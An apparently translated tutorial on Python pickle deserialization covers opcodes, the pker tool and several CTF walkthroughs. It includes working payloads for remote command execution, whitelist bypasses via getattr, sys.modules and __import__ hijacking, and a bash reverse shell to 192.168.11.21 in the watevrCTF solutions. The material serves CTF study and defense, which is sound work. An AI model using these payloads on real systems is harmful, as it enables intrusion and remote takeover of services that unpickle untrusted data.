A preliminary study on pickle deserialization


Preface
basic knowledge
Introduction to pickle
Serializable object
object.__reduce__() function

Detailed interpretation of the pickle process
Introduction to opcode
opcode version
pickletools

Exploit
Use ideas
Preliminary understanding: simple demo of pickle EXP
How to write opcode
Common opcode analysis
Splicing opcode
Global variable coverage
Function execution
Instantiate object
Use of pker (recommended)
Precautions

CTF combat
Before doing the question: understand pickle.Unpickler.find_class()
Code-Breaking: picklecode
watevrCTF-2019:Pickle Store
Colleges and Universities Fighting Epidemic Network Security Sharing Competition: webtmp

pker instructions
Introduction
What pker can do
Usage and examples
pker: global variable coverage
pker: function execution
pker: instantiate objects
Manual assistance

pker: CTF combat
Code-Breaking: picklecode
BalsnCTF:pyshv1
BalsnCTF:pyshv2
BalsnCTF: pyshv3
watevrCTF-2019: Pickle Store
SUCTF-2019: guess_game
Colleges and Universities Fighting Epidemic Network Security Sharing Competition: webtmp

Preface
I recently ran into a CTF challenge about pickle. Many experts have already picked this topic apart, but I still studied it carefully and have tried to summarize what I learned about pickle deserialization in as much detail as possible. This article covers the basic principles of pickle, how the PVM works step by step, opcode analysis, walkthroughs of real CTF challenges, and the use of the pker tool. I hope it helps people who are new to pickle deserialization. The article is long; if you find a mistake, please point it out.

Basic knowledge
Introduction to pickle
Like PHP, Python has a serialization facility for persisting in-memory data. pickle is Python's package for serialization and deserialization.
Python also has a lower-level serialization package, marshal; in day-to-day development pickle is the one generally used.
Compared with json: pickle stores data in a binary format that is hard to read by hand; json is cross-language, while pickle is specific to Python; pickle can represent almost every Python type (including custom types), whereas json can only represent a few built-in types and cannot represent custom types.
pickle can in fact be regarded as a language of its own: by hand-editing the opcodes you can execute Python code, overwrite variables, and so on. Hand-written opcode is more flexible than what pickle serialization generates, and some opcode sequences cannot be produced by serialization at all (pickle can parse more than it can generate).

Serializable object
None, True and False
Integers, floating-point numbers and complex numbers
str, bytes and bytearray
tuple, list, set and dict containing only picklable objects
Functions defined at the top level of a module (defined with def; lambda functions cannot be pickled)
Built-in functions defined at the top level of a module
Classes defined at the top level of a module
Instances of classes whose __dict__ or whose __getstate__() return value is picklable (see "Pickling Class Instances" in the official documentation for details)

object.__reduce__() function

During development, a class can override object.__reduce__() to control how its instances are rebuilt. Specifically, Python requires object.__reduce__() to return a tuple of the form (callable, (para1, para2, …)[, …]). Whenever an object of this type is unpickled, the callable is called with those parameters to produce the object (the callable is effectively a constructor).
Among the pickle opcodes described below, R is closely tied to object.__reduce__(): it pops the tuple on top of the stack as the arguments and the object beneath it as the function (the arguments must be a tuple), then calls the function and pushes the result. In effect, R is the opcode form of object.__reduce__(): the value returned by __reduce__() becomes the operands of R. When an object that defines this method is serialized with pickle, the resulting data contains R.
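As a harmless illustration of the link between __reduce__() and R, here is a minimal sketch. The class FortyTwo and its values are made up for this example; it deliberately returns the built-in int as the callable so that nothing dangerous runs. Only pickle and pickletools from the standard library are used.

```python
import pickle
import pickletools

class FortyTwo:
    # Hypothetical class: unpickling it calls int("42") instead of rebuilding FortyTwo.
    def __reduce__(self):
        return (int, ("42",))

data = pickle.dumps(FortyTwo(), protocol=0)

# List the opcode names in the stream without executing it.
opnames = [op.name for op, arg, pos in pickletools.genops(data)]

restored = pickle.loads(data)  # the R opcode calls int("42")
print(opnames)
print(restored, type(restored))
```

The stream contains a GLOBAL for the callable, a tuple for the arguments, and a REDUCE (R) that performs the call, which is why the loaded value is an int rather than a FortyTwo instance.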

Detailed interpretation of the pickle process
pickle data is parsed by the Pickle Virtual Machine (PVM).
The PVM has three parts: 1. the parsing engine 2. the stack 3. the memo:

Parsing engine: reads opcodes and their arguments from the stream and interprets them. It repeats this until it reaches the . opcode (STOP); the value left on top of the stack is returned as the deserialized object.

Stack: implemented as a Python list; used for temporary storage of data, arguments and objects.
memo: implemented as a Python dict; provides storage that lasts for the lifetime of the PVM. Put simply, deserialized data is stored in the memo as key-value pairs so that it can be used again later.
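To make the three parts concrete, here is a toy interpreter for a tiny subset of version 0 opcodes (I, S, (, t, p, g, 0 and .). It is only a sketch of the idea, not the real PVM: the function name toy_pvm is made up, string escapes are not handled, and every other opcode is rejected.

```python
import pickle

def toy_pvm(data: bytes):
    """Interpret a small subset of protocol 0 opcodes with a stack and a memo."""
    stack, memo = [], {}
    MARK = object()  # sentinel pushed by the "(" opcode
    pos = 0

    def readline() -> bytes:
        # Read the newline-terminated argument that follows an opcode.
        nonlocal pos
        end = data.index(b"\n", pos)
        line = data[pos:end]
        pos = end + 1
        return line

    while True:
        op = data[pos:pos + 1]
        pos += 1
        if op == b"I":                      # push an integer
            stack.append(int(readline()))
        elif op == b"S":                    # push a quoted string (no escape handling)
            stack.append(readline().decode("ascii")[1:-1])
        elif op == b"(":                    # push a mark
            stack.append(MARK)
        elif op == b"t":                    # build a tuple from everything above the mark
            items = []
            while stack[-1] is not MARK:
                items.append(stack.pop())
            stack.pop()                     # drop the mark itself
            stack.append(tuple(reversed(items)))
        elif op == b"p":                    # copy the top of the stack into the memo
            memo[int(readline())] = stack[-1]
        elif op == b"g":                    # push a memo entry back onto the stack
            stack.append(memo[int(readline())])
        elif op == b"0":                    # pop and discard the top of the stack
            stack.pop()
        elif op == b".":                    # STOP: the top of the stack is the result
            return stack.pop()
        else:
            raise ValueError(f"opcode {op!r} is not supported by this sketch")

payload = b"(I1\nS'a'\np0\ng0\nt."
toy_result = toy_pvm(payload)
real_result = pickle.loads(payload)
print(toy_result, real_result)
```

For this payload the toy interpreter and pickle.loads produce the same tuple, which shows the parsing engine, stack and memo working together on a small scale.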

To make this easier to follow, I turned the relevant part of the BH talk into animations.

[Animation: the PVM parsing a str]

[Animation: the PVM parsing __reduce__()]

Introduction to opcode
opcode version
pickle has several protocol versions, so the opcodes produced under py3 and py2 differ. pickle is backward compatible, however, so version 0 opcode can be loaded by every version. There are currently 6 pickle protocol versions (0 to 5).

import pickle

a = {'1': 1, '2': 2}

print(f'# Original variable: {a!r}')
for i in range(4):
    print(f'pickle version {i}', pickle.dumps(a, protocol=i))

# Output:
pickle version 0 b'(dp0\nV1\np1\nI1\nsV2\np2\nI2\ns.'
pickle version 1 b'}q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.'
pickle version 2 b'\x80\x02}q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.'
pickle version 3 b'\x80\x03}q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.'

Example of protocol 3 opcode:

# 'abcd'
b'\x80\x03X\x04\x00\x00\x00abcdq\x00.'

# \x80: protocol header (PROTO)   \x03: protocol version
# X: a UTF-8 string follows, prefixed by its length as 4 little-endian bytes (BINUNICODE)
# \x04\x00\x00\x00: data length: 4
# abcd: the data
# q: store the object on top of the stack in the memo; the index is one byte long (BINPUT)
# \x00: the memo index, 0
# .: end of data (STOP)
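The byte-by-byte breakdown above can be checked with a few slices. This is only a sketch for this particular 14-byte stream; the variable names are made up, and the offsets are hard-wired to the layout shown above.

```python
import pickle
import struct

data = b"\x80\x03X\x04\x00\x00\x00abcdq\x00."

proto_op, version = data[0:1], data[1]          # PROTO opcode and protocol version
str_op = data[2:3]                              # X: BINUNICODE
(length,) = struct.unpack("<I", data[3:7])      # 4-byte little-endian length
text = data[7:7 + length].decode("utf-8")       # the string itself
put_op = data[7 + length:8 + length]            # q: BINPUT
memo_index = data[8 + length]                   # one-byte memo index
stop_op = data[9 + length:10 + length]          # .: STOP

print(proto_op, version, str_op, length, text, put_op, memo_index, stop_op)
print(pickle.loads(data))
```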

Part of the protocol 0 opcode table:

Opcode  Mnemonic  Data type loaded onto the stack  Example
S       STRING    String                           S'foo'\n
V       UNICODE   Unicode                          Vfo\u006f\n
I       INTEGER   Integer                          I42\n

This table is an excerpt from the BH PDF; the complete table can be found in the original PDF.

pickletools
pickletools makes it easy to convert opcode into a human-readable form:

import pickletools

data=b"\x80\x03cbuiltins\nexec\nq\x00X\x13\x00\x00\x00key1=b'1'\nkey2=b'2'q\x01\x85q\x02Rq\x03."
pickletools.dis(data)

    0: \x80 PROTO      3
    2: c    GLOBAL     'builtins exec'
   17: q    BINPUT     0
   19: X    BINUNICODE "key1=b'1'\nkey2=b'2'"
   43: q    BINPUT     1
   45: \x85 TUPLE1
   46: q    BINPUT     2
   48: R    REDUCE
   49: q    BINPUT     3
   51: .    STOP
highest protocol among opcodes = 2

Exploit
Use ideas
Arbitrary code execution or command execution.
Variable overwriting: bypass authentication by overwriting credentials or similar values.
Preliminary understanding: simple demo of pickle EXP

import os
import pickle

class genpoc(object):
    def __reduce__(self):
        s = """echo test >poc.txt"""  # command to be executed
        return os.system, (s,)  # __reduce__ must return a tuple or a string

e = genpoc()
poc = pickle.dumps(e)

print(poc)  # at this point, calling pickle.loads(poc) would execute the command

Variable coverage

import pickle

key1 = b'321'
key2 = b'123'
class A(object):
    def __reduce__(self):
        return (exec,("key1=b'1'\nkey2=b'2'",))

a = A()
pickle_a = pickle.dumps(a)
print(pickle_a)
pickle.loads(pickle_a)
print(key1, key2)

How to write opcode
In CTFs you often need to call several functions or run several instructions in a single payload. __reduce__ cannot do that (it can only call one function at a time, and once exec is disabled there is no way to chain several calls or statements), so the opcode has to be spliced or constructed by hand. Hand-writing opcode is the hard part of pickle deserialization.
This is where it becomes clear why pickle counts as a language. Hand-written opcode is more flexible than what pickle serialization generates: as long as it follows pickle syntax, it can overwrite variables, call functions, and so on.
As the version comparison above shows, version 0 opcode is the easiest to read, so it is what people generally use when writing by hand. All opcode below is version 0.

Common opcode analysis
To fully understand the role of the stack, I strongly recommend studying each opcode while watching the animations.

The comments in the pickle library are not very detailed, and other material online does not spell out how the stack and memo change, so I verified each of the opcodes discussed here by experiment and have tried to explain the changes to the stack and memo clearly.

In addition, TRUE can be written with I as b'I01\n' and FALSE as b'I00\n'; the remaining opcodes can be found in the source code of the pickle library.
A few points follow from these opcodes:

When writing opcode, picture the contents of the stack so that each opcode is used correctly.
It helps to compare the opcodes with Python's own operations (for example, list append corresponds to a and extend to e; dict update corresponds to u).
The c operator tries to import the module itself, so the vulnerable code that calls pickle.loads does not need to have imported it.
pickle has no opcode for reading a list index, a dictionary key, or an object attribute with dot notation. When a lookup is needed, you first have to obtain a function such as getattr or dict.get and call it. Writing is possible, though, thanks to the s, u and b operators. In short: "you cannot look values up, but you can assign them". The only operations with which pickle can look a value up by name are c and i, and how to look values up is a common test point in CTFs.
The s, u and b operators can also create and assign attributes and key-value pairs that did not exist before.
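One way to picture the stack while writing opcode is to let pickletools describe each opcode's stack effect. The sketch below only parses a payload (it never loads it) and prints what each opcode expects on the stack and what it leaves behind; the payload and variable names are made up for illustration.

```python
import pickletools

# Mnemonics of the single-character opcodes mentioned in the notes above.
mnemonics = {code: pickletools.code2op[code].name for code in "aeusbcioR"}
print(mnemonics)

payload = b"cbuiltins\nlen\n(S'whoami'\ntR."  # parsed only, never loaded

rows = []
for op, arg, pos in pickletools.genops(payload):
    before = [s.name for s in op.stack_before]  # what the opcode consumes
    after = [s.name for s in op.stack_after]    # what it leaves on the stack
    rows.append((op.code, op.name, before, after))
    print(f"{op.code!r:6} {op.name:8} {before} -> {after}")
```

pickletools.code2op also exposes a doc attribute for every opcode, which is a convenient substitute when the comments in pickle.py are too terse.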

Splicing opcode
Remove the . that marks the end of the first pickle stream, then append the second pickle stream directly to the first.
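A minimal sketch of splicing, using two harmless streams made up for this example: the first calls len('abc'), the second pushes the integer 42. Both run, and the value on top of the stack when . is reached is what pickle.loads returns.

```python
import pickle

first = b"cbuiltins\nlen\n(S'abc'\ntR."  # evaluates len('abc') and leaves 3 on the stack
second = b"I42\n."                        # pushes 42

spliced = first[:-1] + second             # drop the first stream's trailing "."
result = pickle.loads(spliced)
print(spliced, result)
```

The result of the first stream stays on the stack underneath; if it is in the way, a 0 (POP) can be placed between the two streams.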

Global variable coverage
Python source code:

# secret.py
name='TEST3213qkfsmfo'
# main.py
import pickle
import secret

opcode='''c__main__
secret
(S'name'
S'1'
db.'''

print('before:',secret.name)

output=pickle.loads(opcode.encode())

print('output:',output)
print('after:',secret.name)

First c fetches the global variable secret, then a dictionary is built, and b uses it to set the attributes of secret. The payload used is:

opcode='''c__main__
secret
(S'name'
S'1'
db.'''
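The same technique can be tried in a single file. In this sketch the two module objects are created in memory instead of living in secret.py and main.py; the module names demo_app and demo_secret are made up, and demo_app plays the role that __main__ plays above.

```python
import pickle
import sys
import types

secret = types.ModuleType("demo_secret")  # stands in for secret.py
secret.name = "TEST3213qkfsmfo"

app = types.ModuleType("demo_app")        # stands in for __main__
app.secret = secret                       # like "import secret" in main.py
sys.modules["demo_app"] = app             # make it reachable by the c opcode

opcode = b"cdemo_app\nsecret\n(S'name'\nS'1'\ndb."

before = secret.name
output = pickle.loads(opcode)             # c fetches secret, d builds the dict, b applies it
after = secret.name
print(before, after, output is secret)
```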

Function execution
There are three opcodes related to function execution: R, i, o, so we can construct from three directions:

R:

b'''cos
system
(S'whoami'
tR.'''

i:

b'''(S'whoami'
ios
system
.'''

o:

b'''(cos
system
S'whoami'
o.'''
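To compare the three forms safely, the sketch below swaps os.system for the built-in len (an assumption made purely so the example has no side effects) and keeps the opcode layout identical to the payloads above.

```python
import pickle

payloads = {
    "R": b"cbuiltins\nlen\n(S'whoami'\ntR.",  # push callable, push args tuple, REDUCE
    "i": b"(S'whoami'\nibuiltins\nlen\n.",    # mark, args, then INST names the callable
    "o": b"(cbuiltins\nlen\nS'whoami'\no.",   # mark, callable, args, then OBJ
}

results = {name: pickle.loads(data) for name, data in payloads.items()}
print(results)
```

The difference is only in where the callable sits: below the argument tuple for R, named after the opcode for i, and first after the mark for o.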

Instantiate object
Instantiating an object is a special case of function execution. Here is a simple construction using R; the other methods are similar:

class Student:
    def __init__(self, name, age):
        self.name = name
        self.age = age

data=b'''c__main__
Student
(S'XiaoMing'
S"20"
tR.'''

a=pickle.loads(data)
print(a.name,a.age)

Use of pker (recommended)
pker is a tool written by @eddieivan01 that parses Python-style source code and generates pickle opcode from it. The source code is available at https://github.com/eddieivan01/pker. How the parser works is described in the author's article "Pickle opcode is constructed through AST".
pker makes writing pickle opcode much more convenient; its use is described in detail below. Note that I recommend using pker as an aid only once you are able to write the opcode by hand; do not rely on it too much.
Precautions
The result of pickle serialization depends on the operating system, so a payload built on Windows may not run on Linux. For example:

# linux(note posix):
b'cposix\nsystem\np0\n(Vwhoami\np1\ntp2\nRp3\n.'

# windows(note nt):
b'cnt\nsystem\np0\n(Vwhoami\np1\ntp2\nRp3\n.'
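The difference comes from the module in which os.system is really defined. A small sketch that shows this on whatever platform it runs on (pickling a function only stores a reference to it, so nothing is executed):

```python
import os
import pickle

payload = pickle.dumps(os.system, protocol=0)  # serializes a reference only
module_name = os.system.__module__             # 'posix' on Linux, 'nt' on Windows
print(module_name, payload)
```

A hand-written reference of the form cos followed by system avoids the problem, because the os module exposes system on both platforms.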

CTF combat
Before doing the question: understand pickle.Unpickler.find_class()
The official advice for pickle's security problem is to override find_class() and introduce a whitelist, so many CTF challenges revolve around this function, and it is important to understand how to get around it.
When find_class() is called:

From the opcode perspective, it is called when c, i or b'\x93' appears, so modules brought in directly by these three opcodes must not break the rules.
From the Python code perspective, find_class() is only called while one of those opcodes is being parsed. Once a lookup has passed, find_class() is not called again for whatever is done with the result: a function obtained after passing the check is not subject to the blacklist, so some blacklists can be bypassed through __import__.
Let's look at two examples first:

import builtins
import pickle
import sys

# Example 1
safe_builtins = {'range','complex','set','frozenset','slice',}

class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %(module, name))

# Example 2
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__': # Only allow __main__ modules
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

The first example comes from the official documentation. It uses a whitelist to restrict the names that can be loaded to {'range','complex','set','frozenset','slice'} from builtins.
The second example is the filter used in webtmp, which only allows the __main__ module. It looks safe, but modules imported by the main program can be reached and modified through __main__, which leads to variable overwriting.

These two examples show that, for developers, a whitelist that carefully lists safe modules is one way to avoid security problems; for attackers, getting around the restrictions in find_class is the key to pickle deserialization.
In addition, CTF challenges often combine this with basic Python knowledge (usually built-in modules, attributes and functions) to test how well you know the whitelisted modules, so when working on a challenge it pays to read the documentation of the whitelisted modules first :)
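To see exactly which lookups go through find_class(), a subclass can record them. In this sketch LoggingUnpickler is a made-up helper and the payload is harmless: it fetches getattr and str with c, then uses getattr to reach str.upper.

```python
import io
import pickle

class LoggingUnpickler(pickle.Unpickler):
    """Hypothetical helper: records every lookup that goes through find_class()."""

    def __init__(self, file):
        super().__init__(file)
        self.lookups = []

    def find_class(self, module, name):
        self.lookups.append((module, name))
        return super().find_class(module, name)

# getattr(str, 'upper')('abc'), written as version 0 opcode
payload = b"cbuiltins\ngetattr\n(cbuiltins\nstr\nS'upper'\ntR(S'abc'\ntR."

unpickler = LoggingUnpickler(io.BytesIO(payload))
result = unpickler.load()
print(result)
print(unpickler.lookups)
```

Only the two c lookups are recorded. str.upper is obtained through getattr and never passes through find_class(), which is why a filter that lets getattr through can be sidestepped.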

Code-Breaking: picklecode
The challenge restricts the modules that pickle may import to builtins and sets a blacklist of names: {'eval','exec','execfile','compile','open','input','__import__','exit'}, so what we can use directly is:

Names in the builtins module that are not on the blacklist.
Modules already imported: io, builtins (reaching them requires functions from the builtins module first)
getattr is not on the blacklist, so getattr can be used to fetch the members of io or builtins and the members of those members :). builtins contains dangerous functions such as eval and exec, and even though they are blacklisted they can still be obtained through getattr. pickle cannot fetch the builtins module object itself directly, but it can be obtained through builtins.globals(); with that, arbitrary code can be executed. The payload is:

b'''cbuiltins
getattr
p0
(cbuiltins
dict
S'get'
tRp1
cbuiltins
globals
)Rp2
00g1
(g2
S'builtins'
tRp3
0g0
(g3
S'eval'
tR(S'__import__("os").system("whoami")'
tR.
'''

watevrCTF-2019:Pickle Store
The challenge is a black box and there is no blacklist or whitelist, so simply modify the cookie to get a reverse shell. Payload:

b'''cos
system
(S"bash -c 'bash -i >& /dev/tcp/192.168.11.21/8888 0>&1'"
tR.
'''

Colleges and Universities Fighting Epidemic Network Security Sharing Competition: webtmp
The challenge overrides find_class so that only objects from the __main__ module can be loaded:

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__': # Only allow __main__ modules
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

In addition, b'R' is prohibited:

try:
    pickle_data = request.form.get('data')
    if b'R' in base64.b64decode(pickle_data): 
        return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'

The goal is to overwrite the values in secret that are used for verification. secret is imported by the main program, so it exists as the attribute secret of __main__ and can be overwritten directly, which bypasses the restriction:

b'''c__main__
secret
(S'name'
S"1"
S"category"
S"2"
db0(S"1"
S"2"
i__main__
Animal
.'''

Besides the challenges above, there are four more: BalsnCTF: pyshv1 to pyshv3 and SUCTF-2019: guess_game. Writing their payloads by hand is rather tedious, so they are solved with the pker tool later in this article.

pker instructions
Introduction
pker is a tool written by @eddieivan01 that parses Python-style source code and generates pickle opcode from it. The source code is available at https://github.com/eddieivan01/pker.
pker makes writing pickle opcode more convenient (it generates version 0 opcode).
Again, I recommend using pker as an aid only once you can write opcode by hand; do not rely on it too much.
In addition, pker is implemented with Python's ast (abstract syntax tree) library. The abstract syntax tree is an important topic in its own right; if you are interested, study the source code of the ast library and of pker. For reasons of space I will not go into it here.
What pker can do
Quoted from https://xz.aliyun.com/t/7012#toc-5:

Variable assignment: save to memo, save the memo subscript and variable name
Function call
Type literal construction
List and dict member modification
Object member variable modification
Specifically, pker can be used to cover original variables, execute functions, and instantiate new objects.

Usage and examples
pker has some special syntax for pickle that needs to be learned (examples are given later).
One more point to keep in mind: classes, modules, packages, attributes and so on are all objects in Python; with that in mind each operation is easy to understand.
pker mainly relies on three special functions, GLOBAL, INST and OBJ, plus a few necessary conversions. Other opcodes can also be used by hand:

Any module below may be a submodule name containing a dot.
When calling these functions, make sure the types of the arguments match the examples.
The corresponding opcode is generated, but it is not strictly equivalent to the pker code.

GLOBAL
Corresponding opcode: b'c'
Gets a global object from a module (modules that have not been imported are fine too, such as os below):
GLOBAL('os', 'system')
Input: module, instance (callables and modules are both instances)

INST
Corresponding opcode: b'i'
Creates an object and pushes it onto the stack (can be used to execute a function):
INST('os', 'system', 'ls')
Input: module, callable, para

OBJ
Corresponding opcode: b'o'
Creates an object and pushes it onto the stack (the first argument is the callable; can be used to execute a function):
OBJ(GLOBAL('os', 'system'), 'ls')
Input: callable, para

xxx(xx, …)
Corresponding opcode: b'R'
Calls function xxx with argument xx (the function is pushed first, then the arguments, then the call is made)

li[0]=321
or
globals_dic['local_var']='hello'
Corresponding opcode: b's'
Updates one item of a list or dictionary

xx.attr=123
Corresponding opcode: b'b'
Sets an attribute of object xx

return
Corresponding opcode: b'0'
Pops the stack (the value becomes the return value of pickle.loads):
return xxx # Note: only one object, or none, can be returned (even if several are separated by commas, a single tuple is returned in the end)

Note:

Because of the limits of the opcodes themselves, pker naturally cannot read values through a list index, a dictionary key, or dot-notation attribute access. When a lookup is needed, you first have to obtain a function such as getattr or dict.get. Assignment is possible, though, thanks to the s, u and b operators. In short: "you cannot look values up, but you can assign them".
When pker emits S, it wraps the string in single quotes, so a double-quoted string in pker code becomes a single-quoted string in the opcode:

test="123"
return test

is compiled to:

b"S'123'\np0\n0g0\n."

pker: global variable coverage
Overwrite the name and category variables in the secret module imported directly by the executed file:

secret=GLOBAL('__main__', 'secret')
# The executed Python file is treated as the __main__ module, and secret is an attribute of it
secret.name='1'
secret.category='2'

Overwrite variables in an imported module:

game = GLOBAL('guess_game', 'game')
game.curr_ticket = '123'

Some concrete examples of the basic operations follow.

pker: function execution
Call via b'R':

s='whoami'
system = GLOBAL('os', 'system')
system(s) # `b'R'` call
return

Call via b'i':

INST('os', 'system', 'whoami')

Call via b'c' and b'o':

OBJ(GLOBAL('os', 'system'), 'whoami')

Calling a function with several arguments:

INST('[module]', '[callable]'[, par0,par1...])
OBJ(GLOBAL('[module]', '[callable]')[, par0,par1...])

pker: instantiate objects
Instantiating an object is a special function execution

animal = INST('__main__', 'Animal','1','2')
return animal


# or

animal = OBJ(GLOBAL('__main__', 'Animal'), '1','2')
return animal

where the original Python file contains:

class Animal:

    def __init__(self, name, category):
        self.name = name
        self.category = category

You can also instantiate and then assign:

animal = INST('__main__', 'Animal')
animal.name='1'
animal.category='2'
return animal

Manual assistance
Splicing opcode: remove the . that marks the end of the first pickle stream, then join the two streams.
When you need an ordinary class instance, you can generate it with pickle.dumps first and then splice it into the payload.
pker: CTF combat
When using pker in practice, first work out the overall approach and make sure you could write the opcode for each step, then use pker to implement it.
Code-Breaking: picklecode
For the analysis, see the hand-written opcode walkthrough in the CTF combat section above. The pker code is:

getattr=GLOBAL('builtins','getattr')
dict=GLOBAL('builtins','dict')
dict_get=getattr(dict,'get')
glo_dic=GLOBAL('builtins','globals')()
builtins=dict_get(glo_dic,'builtins')
eval=getattr(builtins,'eval')
eval('print("123")')
return

BalsnCTF:pyshv1
The challenge's find_class only allows the sys module, and the object name may not contain a dot. The intent is obvious: forbid submodules and allow only top-level names.
The sys module has a dictionary, modules, that holds every module imported by the program at run time and decides what an import returns. If the dictionary is changed, the imported modules change too. sys itself is also in modules, and this self-reference lets us bypass the restriction. The steps are:

Because sys is contained in its own attribute sys.modules, we can use an s assignment to step one level down: sys.modules['sys']=sys.modules is equivalent to sys=sys.modules. After that, the names directly under the original sys.modules can be fetched, i.e. sys.modules.xxx.
First fetch the get function of modules; then, as in the previous step, use s to replace the sys entry in modules with the os module: sys['sys']=sys.get('os').
Use c to fetch system, after which system commands can be executed.

The whole exploitation process is quite clever. The pker code is:

modules=GLOBAL('sys', 'modules')
modules['sys']=modules
modules_get=GLOBAL('sys', 'get')
os=modules_get('os')
modules['sys']=os
system=GLOBAL('sys', 'system')
system('whoami')
return
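The property this exploit relies on, that an import simply returns whatever object is stored under the name in sys.modules, can be checked in plain Python. The sketch below uses the made-up keys demo_self and demo_alias so that the real sys entry is never touched, and removes them afterwards.

```python
import os
import sys

# Hypothetical keys, used so the real 'sys' entry is left untouched.
sys.modules["demo_self"] = sys.modules   # mirrors modules['sys'] = modules
sys.modules["demo_alias"] = os           # mirrors modules['sys'] = os

try:
    first = __import__("demo_self")      # returns the sys.modules dict itself
    second = __import__("demo_alias")    # returns the os module
    is_modules_dict = first is sys.modules
    get_finds_os = getattr(first, "get")("os") is os
    system_found = getattr(second, "system") is os.system
finally:
    del sys.modules["demo_self"], sys.modules["demo_alias"]

print(is_modules_dict, get_finds_os, system_found)
```

With the key sys instead of the made-up keys, a find_class that only allows the module name sys ends up handing out dict.get and then os.system, which is the chain the pker code above builds.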

BalsnCTF:pyshv2
Similar to v1: the challenge's find_class only allows the structs module, "." is not allowed in the object name, and only top-level names are allowed. structs is an empty module. However, find_class calls the __import__ function:

class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        if module not in whitelist or '.' in name:
            raise KeyError('The pickle is spoilt :(')
        module = __import__(module) # Note that __import__ is called here
        return getattr(module, name)

Note the following properties of Python:

__builtins__ is a dictionary shared by all modules that holds every built-in function. A built-in can be hijacked by replacing the value of its key in __builtins__. Since the challenge calls __import__, we can hijack __import__ and in that way control what the following getattr operates on.
__dict__ stores, and determines, all the attributes of an object. If its contents are changed, the attributes change too.
The c opcode is implemented by calling find_class (incidentally, it actually imports the module first and then calls find_class, but because Python's import statement calls __import__ with five arguments, that step cannot be exploited). What matters is that the find_class in this challenge calls __import__ once and then calls getattr, which amounts to a value lookup.

Now let's lay out the exploitation process:

Target: structs.__builtins__['eval'] → we need the structs.__builtins__.get function.
Make the lookup jump two levels: hijack __import__ with structs.__getattribute__, so that the opcode cstructs followed by xxx becomes structs.__getattribute__('structs').xxx.
Combining 1 and 2: structs.__getattribute__('structs') must return structs.__builtins__, and xxx is set to get.
Use structs.__dict__ to add a new attribute structs.structs with the value structs.__builtins__, so that structs.__getattribute__('structs') returns structs.__builtins__.

pker implementation:

__dict__ = GLOBAL('structs', '__dict__') # attribute dict of structs
__builtins__ = GLOBAL('structs', '__builtins__') # dict of built-in functions
gtat = GLOBAL('structs', '__getattribute__') # get structs.__getattribute__
__builtins__['__import__'] = gtat # hijack the __import__ function
__dict__['structs'] = __builtins__ # set the attribute structs.structs to __builtins__
builtin_get = GLOBAL('structs', 'get') # structs.__getattribute__('structs').get
eval = builtin_get('eval') # structs.structs['eval'], i.e. __builtins__['eval']
eval('print(123)')
return

BalsnCTF: pyshv3
The find_class of v3 is similar to v1 and restricts imports to the structs module. Unlike v1 and v2, in v3 the flag is read by the program itself, so RCE is not required. The key code is:

class Pysh(object):
    def __init__(self):
        self.key = os.urandom(100)
        self.login()
        self.cmds = {
            'help': self.cmd_help,
            'whoami': self.cmd_whoami,
            'su': self.cmd_su,
            'flag': self.cmd_flag,
        }

    def login(self):
        with open('../flag.txt', 'rb') as f:
            flag = f.read()
        flag = bytes(a ^ b for a, b in zip(self.key, flag))
        user = input().encode('ascii')
        user = codecs.decode(user, 'base64')
        user = pickle.loads(user)
        print('Login as ' + user.name + ' - ' + user.group)
        user.privileged = False
        user.flag = flag
        self.user = user

    def run(self):
        while True:
            req = input('$ ')
            func = self.cmds.get(req, None)
            if func is None:
                print('pysh: ' + req + ': command not found')
            else:
                func()

    ...

    def cmd_flag(self):
        if not self.user.privileged:
            print('flag: Permission denied')
        else:
            print(bytes(a ^ b for a, b in zip(self.user.flag, self.key)))


if __name__ == '__main__':
    pysh = Pysh()
    pysh.run()

The program first performs pickle deserialization, then sets self.user.privileged to False, and then enters the command loop, which provides the cmd_flag function. If self.user.privileged is true, the flag is printed.
A class that implements any of __get__, __set__ and __delete__ is called a descriptor class, and an instance of such a class is a descriptor. When an attribute of a class is a descriptor, looking up or setting that attribute on an instance no longer goes through the instance's __dict__; the descriptor's __get__, __set__ or __delete__ method is called instead. Note that the descriptor has to be set on the class, as a class attribute rather than an instance attribute, for it to take effect.
So if we give the User class a __set__ method, it becomes a descriptor class; if a User instance is then set as the privileged attribute of the User class itself, assigning to privileged on an instance calls __set__ and nothing is actually assigned, which bypasses the assignment and yields the flag.
The pker code is:

User=GLOBAL('structs','User')
User.__set__=GLOBAL('structs','User') # Make User a descriptor class
des=User('des','des') # Descriptor
User.privileged=des # Note that the descriptor must be set as a class attribute, not an instance attribute
user=User('hachp1','hachp1') # Instantiate a User object

return user
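The descriptor trick can be reproduced in plain Python without pickle. In this sketch the User class is a made-up stand-in with the same constructor shape as in the challenge; the assignments mirror the pker code line by line.

```python
class User:
    # Hypothetical stand-in for the challenge's User class.
    def __init__(self, name, group):
        self.name = name
        self.group = group

User.__set__ = User                    # any __set__ makes User a descriptor class
User.privileged = User("des", "des")   # the descriptor must be a class attribute

user = User("hachp1", "hachp1")
user.privileged = False                # what login() does after unpickling

assignment_stored = "privileged" in vars(user)
still_truthy = bool(user.privileged)
print(assignment_stored, still_truthy)
```

The assignment is routed to __set__, which here just constructs and discards another User, so nothing lands in the instance's __dict__. Reading user.privileged then falls back to the class attribute, an object that is truthy, so the check in cmd_flag passes.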

watevrCTF-2019: Pickle Store
For the analysis, see the hand-written opcode walkthrough in the CTF combat section above. The pker code is:

system=GLOBAL('os', 'system')
system('bash -c "bash -i >& /dev/tcp/192.168.11.21/8888 0>&1"')
return

SUCTF-2019: guess_game
